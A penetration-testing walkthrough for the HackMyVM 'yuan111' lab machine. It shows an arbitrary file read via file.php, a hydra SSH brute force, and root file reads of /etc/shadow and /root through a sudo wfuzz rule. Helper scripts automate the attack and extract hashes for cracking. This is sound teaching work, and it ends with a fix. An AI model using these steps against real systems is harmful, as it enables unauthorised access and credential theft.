
# HackMyVM - yuan111 Target Machine Penetration Notes




Environment and Goal

  • Target IP: 192.168.56.110
  • Exposed services: 22/tcp, 80/tcp
  • Goal: get a regular-user shell through the web entry point, then escalate to root

I. Information Gathering

1. Port scan

nmap -p 1-65535 -T4 -A -v 192.168.56.110

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Rockyou.txt - \xE5\xAF\x86\xE7\xA0\x81\xE5\xAD\x97\xE5\x85\xB8\xE6\x96\x87\xE4\xBB\xB6\xE4\xBB\x8B\xE7\xBB\x8D
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.62 (Debian)

Only 22 (SSH) and 80 (HTTP) are open, so the web service is the first place to look for an entry point. The escaped http-title is worth decoding: the bytes read "Rockyou.txt - 密码字典文件介绍" ("Rockyou.txt - password dictionary file introduction"), which is already a hint about what comes later.

II. Web Enumeration and Arbitrary File Read

The homepage on port 80 is a short introduction to the rockyou wordlist; the naming alone suggests rockyou will be needed for brute forcing later.

The front-end source contains nothing directly exploitable. A dirsearch run over the site finds an accessible /file.php route, but requesting it directly returns an empty body. The name suggests the script expects a parameter, so the next step is to fuzz the parameter name:

# Blind run first: establish the baseline response an invalid parameter produces
wfuzz -c -w /usr/share/dirb/wordlists/common.txt 'http://192.168.56.110/file.php?FUZZ=/etc/passwd'

# Hide the baseline (0-char) responses so only parameter names that change the output remain
wfuzz -c -w /usr/share/dirb/wordlists/common.txt --hh 0 'http://192.168.56.110/file.php?FUZZ=/etc/passwd'

This confirms the valid parameter name is file, and that the endpoint reads arbitrary files from disk:

curl http://192.168.56.110/file.php\?file\=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tao:x:1000:1000:,,,:/home/tao:/bin/bash

So the regular user is tao: the only account with UID 1000 or above and an interactive shell. Combined with the rockyou hint on the homepage, the next step is almost certainly a dictionary attack on tao's SSH credentials.
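The two wfuzz runs above and the conclusion drawn from /etc/passwd are the same procedure every time: get a baseline, keep only parameter names whose response differs, confirm the hit by checking for /etc/passwd structure, then pick out the human accounts. The script below is an added example (not code from the original write-up) that implements that procedure; the `fake_fetch` stub and its canned file system are constructed so it runs offline, and the URL and candidate parameter names are assumptions. Against a lab target, replace `fake_fetch` with a real HTTP GET.

```python
"""LFI parameter discovery and /etc/passwd triage (added example, not from the write-up)."""
import re
from typing import Callable, List, Optional

# Constructed stand-in for the vulnerable endpoint: only the "file" parameter
# is honoured; every other parameter name returns the same empty body that the
# blind wfuzz run sees.  The passwd content is a shortened copy of the dump above.
FAKE_FS = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
        "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
        "tao:x:1000:1000:,,,:/home/tao:/bin/bash\n"
    ),
}


def fake_fetch(url: str) -> str:
    """Simulated GET: parse the query string and mimic file.php's behaviour."""
    _, _, query = url.partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    return FAKE_FS.get(params.get("file", ""), "")


def find_lfi_param(fetch: Callable[[str], str], base: str,
                   candidates: List[str], probe: str = "/etc/passwd") -> Optional[str]:
    """Return the first parameter name whose response differs from the baseline
    AND contains a root entry in passwd format; None if nothing works.

    Comparing against a baseline is what `--hh 0` did manually above, but it
    also works when the error page is non-empty."""
    baseline = fetch(f"{base}?zzbaseline={probe}")   # assumed-unused name
    for name in candidates:
        body = fetch(f"{base}?{name}={probe}")
        if body == baseline:
            continue
        if re.search(r"^root:[^:]*:0:0:", body, re.M):
            return name
    return None


# name:password:UID:GID:GECOS:home:shell
PASSWD_RE = re.compile(r"^([^:]+):[^:]*:(\d+):(\d+):[^:]*:([^:]*):([^:\n]*)$", re.M)
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def login_users(passwd: str, min_uid: int = 1000) -> List[str]:
    """Human accounts: UID >= min_uid with an interactive shell.
    nobody (65534) is excluded because its shell is nologin, not by UID."""
    return [m.group(1) for m in PASSWD_RE.finditer(passwd)
            if int(m.group(2)) >= min_uid and m.group(5) not in NOLOGIN_SHELLS]


if __name__ == "__main__":
    base = "http://192.168.56.110/file.php"
    param = find_lfi_param(fake_fetch, base, ["page", "path", "include", "file"])
    print("LFI parameter:", param)
    if param:
        print("login users:", login_users(fake_fetch(f"{base}?{param}=/etc/passwd")))
```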

III. Getting an Initial Shell

Run hydra with rockyou.txt directly against SSH:

hydra -l tao -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.110 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-04 11:17:24
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.56.110:22/
[22][ssh] host: 192.168.56.110 login: tao password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-04 11:17:44

Hydra recovers the password rockyou. Logging in over SSH as tao with it gives the regular-user shell.

IV. Privilege Escalation

With the regular-user shell, the first check is the sudo configuration (sudo -l):

tao can run two commands without a password: wfuzz and id. GTFOBins has no ready-made escalation for either, so the path has to be worked out by hand.

id only reports the current user's identity and offers nothing to abuse, so the focus is wfuzz. wfuzz supports plugin extensions, but in practice:

  • the plugin directory is not writable;
  • a plugin written under the home directory is not picked up when wfuzz is invoked through sudo;

The realisation was that wfuzz in --dry-run mode prints every wordlist entry without sending a request, which turns "read a file as root" into "feed the file as a wordlist":

sudo wfuzz --dry-run -w /root/root.txt http://127.0.0.1/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://127.0.0.1/FUZZ
Total requests: 1

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 0 0 L 0 W 0 Ch "flag{xxxx}"

Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0

That reads root.txt directly, but it does not give a root shell. The same trick reads /etc/shadow:

sudo wfuzz --dry-run -w /etc/shadow http://127.0.0.1/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://127.0.0.1/FUZZ
Total requests: 26

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 0 0 L 0 W 0 Ch "root:$6$N2l0GYAc2HyLxS2d$Ks1awHW0JPPVXft/ZpvptPLmh/P/XiBRqH8G1uTjpDhrLHUwmN2PK8.MqQcrIwSXf2CGxk.ue11f9hZzZdtkw1:20460:0:99999:7:::"
000000007: 0 0 L 0 W 0 Ch "man:*:20166:0:99999:7:::"
000000025: 0 0 L 0 W 0 Ch "sshd:*:20166:0:99999:7:::"
000000017: 0 0 L 0 W 0 Ch "gnats:*:20166:0:99999:7:::"
000000018: 0 0 L 0 W 0 Ch "nobody:*:20166:0:99999:7:::"
000000005: 0 0 L 0 W 0 Ch "sync:*:20166:0:99999:7:::"
000000004: 0 0 L 0 W 0 Ch "sys:*:20166:0:99999:7:::"
000000002: 0 0 L 0 W 0 Ch "daemon:*:20166:0:99999:7:::"
000000008: 0 0 L 0 W 0 Ch "lp:*:20166:0:99999:7:::"
000000009: 0 0 L 0 W 0 Ch "mail:*:20166:0:99999:7:::"
000000010: 0 0 L 0 W 0 Ch "news:*:20166:0:99999:7:::"
000000011: 0 0 L 0 W 0 Ch "uucp:*:20166:0:99999:7:::"
000000013: 0 0 L 0 W 0 Ch "www-data:*:20166:0:99999:7:::"
000000012: 0 0 L 0 W 0 Ch "proxy:*:20166:0:99999:7:::"
000000006: 0 0 L 0 W 0 Ch "games:*:20166:0:99999:7:::"
000000016: 0 0 L 0 W 0 Ch "irc:*:20166:0:99999:7:::"
000000026: 0 0 L 0 W 0 Ch "tao:$6$kmyokhFHIyX4L4CM$74nCV6cf4jjTh3wLZb6EzTZ5efutQIUxTjfunweiLTcxLnJcqQGIumpKjSkU7yqxhJl5cs9ebmDtMMXgFcQyI1:20460:0:99999:7:::"
000000020: 0 0 L 0 W 0 Ch "systemd-timesync:*:20166:0:99999:7:::"
000000019: 0 0 L 0 W 0 Ch "_apt:*:20166:0:99999:7:::"
000000021: 0 0 L 0 W 0 Ch "systemd-network:*:20166:0:99999:7:::"
000000022: 0 0 L 0 W 0 Ch "systemd-resolve:*:20166:0:99999:7:::"
000000023: 0 0 L 0 W 0 Ch "systemd-coredump:!!:20166::::::"
000000024: 0 0 L 0 W 0 Ch "messagebus:*:20166:0:99999:7:::"
000000003: 0 0 L 0 W 0 Ch "bin:*:20166:0:99999:7:::"
000000015: 0 0 L 0 W 0 Ch "list:*:20166:0:99999:7:::"
000000014: 0 0 L 0 W 0 Ch "backup:*:20166:0:99999:7:::"

Total time: 0
Processed Requests: 26
Filtered Requests: 0
Requests/sec.: 0

This yields root's password hash. Note that wfuzz prints the entries in completion order, not file order, and the hash is $6$ (sha512crypt). A john run with rockyou against it finds nothing.
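Because the sudo rule makes wfuzz a root-level file reader, it is worth wrapping the trick so any file can be pulled back in its original order and the shadow entries sorted into what is actually crackable. The script below is an added example (not code from the write-up or the wfuzz project): `wfuzz_read_cmd` builds the command used above (assuming the NOPASSWD rule from this box), `reassemble` re-sorts the result table by request ID, and `crackable_hashes` drops locked (`!`, `!!`) and disabled (`*`) entries before writing a john-ready file. `SAMPLE_OUTPUT` is a constructed excerpt in wfuzz 3.1.0's table layout with made-up hashes.

```python
"""Reading files as root through sudo wfuzz --dry-run and triaging /etc/shadow
(added example, not part of the original write-up)."""
import re
from typing import Dict, List, Tuple

# Each result row:  000000026: 0  0 L  0 W  0 Ch  "tao:$6$...:20460:0:99999:7:::"
RESULT_RE = re.compile(r'^(\d+):\s+\S+\s+\d+ L\s+\d+ W\s+\d+ Ch\s+"(.*)"\s*$')

HASH_TYPES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
              "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}


def wfuzz_read_cmd(path: str, target: str = "http://127.0.0.1/FUZZ") -> List[str]:
    """argv that reads `path` as root via the NOPASSWD wfuzz rule (assumed from sudo -l).
    --dry-run prints every wordlist line without sending a request."""
    return ["sudo", "wfuzz", "--dry-run", "-w", path, target]


def reassemble(output: str) -> List[str]:
    """Recover the file's lines in original order from wfuzz's result table.
    Rows arrive in completion order, so sort by the request ID in column 1."""
    rows: List[Tuple[int, str]] = []
    for line in output.splitlines():
        m = RESULT_RE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2)))
    return [payload for _, payload in sorted(rows)]


def crackable_hashes(shadow_lines: List[str]) -> Dict[str, Tuple[str, str]]:
    """user -> (hash, hash type) for shadow entries that can be attacked offline.
    '*' means no password login, '!'/'!!' means locked: both are skipped."""
    out: Dict[str, Tuple[str, str]] = {}
    for line in shadow_lines:
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if not pw or pw.startswith(("*", "!")):
            continue
        kind = next((t for p, t in HASH_TYPES.items() if pw.startswith(p)), "unknown")
        out[user] = (pw, kind)
    return out


def john_file(hashes: Dict[str, Tuple[str, str]]) -> str:
    """user:hash lines as john expects (hashcat -m 1800 wants --username or hash only)."""
    return "".join(f"{u}:{h}\n" for u, (h, _) in hashes.items())


# Constructed sample in wfuzz 3.1.0's layout; hashes are placeholders, not real.
SAMPLE_OUTPUT = """\
Target: http://127.0.0.1/FUZZ
Total requests: 4

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000003:   0          0 L      0 W        0 Ch        "bin:*:20166:0:99999:7:::"
000000001:   0          0 L      0 W        0 Ch        "root:$6$saltsalt$placeholderhash1:20460:0:99999:7:::"
000000004:   0          0 L      0 W        0 Ch        "tao:$6$saltsalt$placeholderhash2:20460:0:99999:7:::"
000000002:   0          0 L      0 W        0 Ch        "daemon:!!:20166::::::"

Total time: 0
"""

if __name__ == "__main__":
    print(" ".join(wfuzz_read_cmd("/etc/shadow")))
    shadow = reassemble(SAMPLE_OUTPUT)
    print("\n".join(shadow))
    print(john_file(crackable_hashes(shadow)), end="")
```

The same parser applies to a `-z dirwalk,/root` run, where each payload is a path under the walked directory instead of a file line, which is how the remaining file under /root shows up later.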

Checking other people's write-ups, wfuzz also ships a dirwalk payload that enumerates the contents of a directory, which lists /root without needing a shell there:

sudo wfuzz -z dirwalk,/root -u http://localhost/FUZZ

The listing shows another text file under /root, and its contents are root's password.

su root with that password gives a root shell.

The underlying flaw is the sudo rule itself rather than any bug in wfuzz: a NOPASSWD entry for a tool that accepts arbitrary file paths (-w, -z file, -z dirwalk) is a root-level file read primitive no matter what the tool is meant for. The fix is to remove the rule, not to try to whitelist arguments.
